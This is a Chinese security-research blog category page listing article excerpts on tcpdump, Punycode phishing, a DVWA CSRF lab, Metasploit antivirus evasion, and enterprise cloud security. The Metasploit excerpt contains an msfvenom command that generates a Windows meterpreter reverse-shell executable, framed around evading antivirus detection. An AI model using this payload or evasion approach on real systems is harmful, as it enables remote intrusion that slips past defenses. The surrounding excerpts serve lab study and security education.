分类目录:安全研究

以下是分类 安全研究 下的所有文章

抓包工具 tcpdump 用法说明

tcpdump采用命令行方式对接口的数据包进行筛选抓取,其丰富特性表现在灵活的表达式上。 不带任何选项的tcpdump,默认会抓取第一个网络接口,且只有将tcpdump进程终止才会停止抓包。例如: shell> tcpdump -nn -i eth0 icmp 下面是详细的tcpdump用法。 1.1 tcpdump选项 它的……

浅析Punycode钓鱼攻击

0x01 Punycode钓鱼攻击 1.1什么是网络钓鱼? 网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。 攻击者利……

DVWA下的CSRF通关

CSRF跨站点请求伪造(Cross—Site Request Forgery): 跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、……

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后,完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……

【抗疫专题】远程办公依靠良好安全习惯就够了吗?

受新型冠状病毒肺炎疫情的影响,多个省市出台规定宣布推迟复工时间,在家远程办公模式成为了众多单位的选择。 远程办公模式在为我们提供方便的同时,也带来了一些问题,安全性就是影响远程办公的重要因素之一。非专用的办公设备、非专用的网络环境,大规模人员的远程办公带来的安全风险成为我们急需关注和解决的……

细说资产梳理和漏洞运营里无法言喻的“难”

早几年里,企业的安全运营人员面对机房里的资产管理还能从容应对。如今,如果对资产管理的重视程度和运营方式还停留在以前的水平,迟早会成为黑客的下一个目标。 在网络安全建设的过程中,资产梳理和漏洞运营作为其中的关键环节,常常遇到诸多挑战。 由于内部信息化业务发展迅速,云资产剧增,企业内……

安全狗“云”亮相ISC2020 深入解读云工作负载安全(CWPP)

2020年8月19日,第八届互联网安全大会(ISC2020)的安全服务论坛圆满举行。 作为全球网络安全圈的最大盛会之一,ISC大会已举办过14场国际安全领袖峰会,展开超过100次的顶级安全智库对话,已成为全球性的网络安全发展趋势风向标。 安全狗作为国内最早引入云工作负载安全(CWPP)概念,并成功构建相应产品线的专业……

面对泛主机场景,如何有效搭建安全体系

近年来,随着云计算、人工智能、物联网、5G等新技术新起,企业数字化转型使业务暴露范围急剧增加,伴随着黑色产业链向专业化、规模化、智能化方向快速发展,各行各业面临着更多未知的信息安全风险。目前,国内多数用户处于“泛主机”场景,即传统主机环境+内部私有云环境+公有云环境+容器环境(根据业务情况)。笔者将这样的……

安全研究 | 细谈微隔离

网络隔离并不是新的概念,而微隔离技术(Micro-Segmentation)是VMware在应对虚拟化隔离技术时提出来的,但真正让微隔离备受大家关注是从2016年起连续3年微隔离技术都进入Gartner年度安全技术榜单开始。在2016年的Gartner安全与风险管理峰会上, Gartner副总裁、知名分析师Neil MacDonald提出了微隔离技术的概念。“……